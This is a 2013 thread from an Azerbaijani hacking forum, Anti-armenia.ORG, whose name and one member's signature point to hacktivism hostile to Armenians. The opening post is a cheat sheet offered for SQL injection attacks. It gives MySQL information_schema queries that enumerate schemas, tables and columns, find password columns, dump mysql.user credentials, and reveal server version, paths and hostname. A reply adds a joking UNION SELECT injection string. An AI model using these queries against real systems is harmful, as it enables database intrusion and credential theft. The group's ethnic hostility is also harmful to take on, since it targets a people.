Anti-armenia.ORG - Forumlar - MySQL Information_schema metadata oxunması



Istifadəçi
     2013-04-11 21:04 GMT                 

mysql_exp


VIP
Mesaj Sayı : 12
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   2  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər :
Ölkə :
Məslək :
Yaş :
Mesaj :

Mövzunu Paylaş!


SQLİ attacklar zamanı istifade olunan information_schema (MySQL 5.x. versiyalar üçün)

Müəyyən database-də olan Cədvəllərin siyahısı:

Kod:
select table_name from information_schema.tables where table_schema='schema_adi'


Müəyyən cədvəldə olan Columnların siyahısı:

Kod:
select column_name from information_schema.columns where table_schema='schema_adi' and table_name='cedvel_adi'


Database-dƏ olan bütün cədvəllərin siyahısı:

Kod:
select table_name from information_schema.tables where table_schema not in ('mysql','information_schema','performance_schema')


Bütün database-lərin siyahısı:

Kod:
select schema_name from information_schema.schemata
-- həmçinin
select database() -- yalnız default istifadə olunan database-in adı.
code]

Column adına uyğun olaraq cədvəllərin tapılması:

Kod:
select table_schema, table_name from information_schema.columns WHERE column_name = ‘pass’
-- pass column-u olan cədvəlləri çıxardır.
r.[/code]


MySQL user-lərin grant-ları:

[code]select grantee, privilege_type, is_grantable from information_schema.user_privileges[/code]


Və digər vasitələr

MySQL user-lərin siyahısı:

[code]select user,password,host from mysql.user[/code]

MySQL versiya:

[code]select @@version[/code]

İnstallation directory:

[code]select @@basedir[/code]

Data directory:

[code]select @@datadir[/code]

Host name:

[code]select @@hostname[/code]

Təşəkkürlər ;)

Anti-armenia.ORG
     
 

Istifadəçi
     2013-04-12 11:53 GMT                 

Qetl-i-yan


İstifadəçi
Mesaj Sayı : 80
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   4  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər :
Ölkə :
Məslək : #Op. Qetl-i-yan
Yaş :
Mesaj :

Mövzunu Paylaş!


Təşəkkürlər, dolğun formada izah etmisən.
+Rep

Bəzən oz-ozümə soruşuram
Hack_Mənim.nəyim?me=-1+union+all+select+1,null,1+from+Qətl-i-Yan
Sonra yenə ozümə deyirəm ki,
Delete from hack where groupby='Qətl-i-Yan'
Son olaraq mənə qalan
Md5(md5($xəyal).md5($Crack-liyi))
Anti-armenia.ORG
     
 

Istifadəçi
     2013-04-12 22:23 GMT                 

mysql_exp


VIP
Mesaj Sayı : 12
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   2  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər :
Ölkə :
Məslək :
Yaş :
Mesaj :

Mövzunu Paylaş!


çox sağol ;)

Anti-armenia.ORG
     
 

Istifadəçi
     2013-04-15 19:50 GMT                 

lezgi099


İstifadəçi
Mesaj Sayı : 14
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   0  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər :
Ölkə :
Məslək :
Yaş :
Mesaj :

Mövzunu Paylaş!


istisnalar var..

Anti-armenia.ORG
     
 

Istifadəçi
     2013-04-15 20:38 GMT                 

mysql_exp


VIP
Mesaj Sayı : 12
Mövzu Sayı :
Rep Ver : 
Rep Sayı :   2  
Indi Saytda : Durum
Cinsiyyət : Oğlan
Şəhər :
Ölkə :
Məslək :
Yaş :
Mesaj :

Mövzunu Paylaş!


hansi istisnalar?

Anti-armenia.ORG
     
 

 
Site By: Ferid23 | Designed: MCH & FERID23  | Site: Anti-armenia.ORG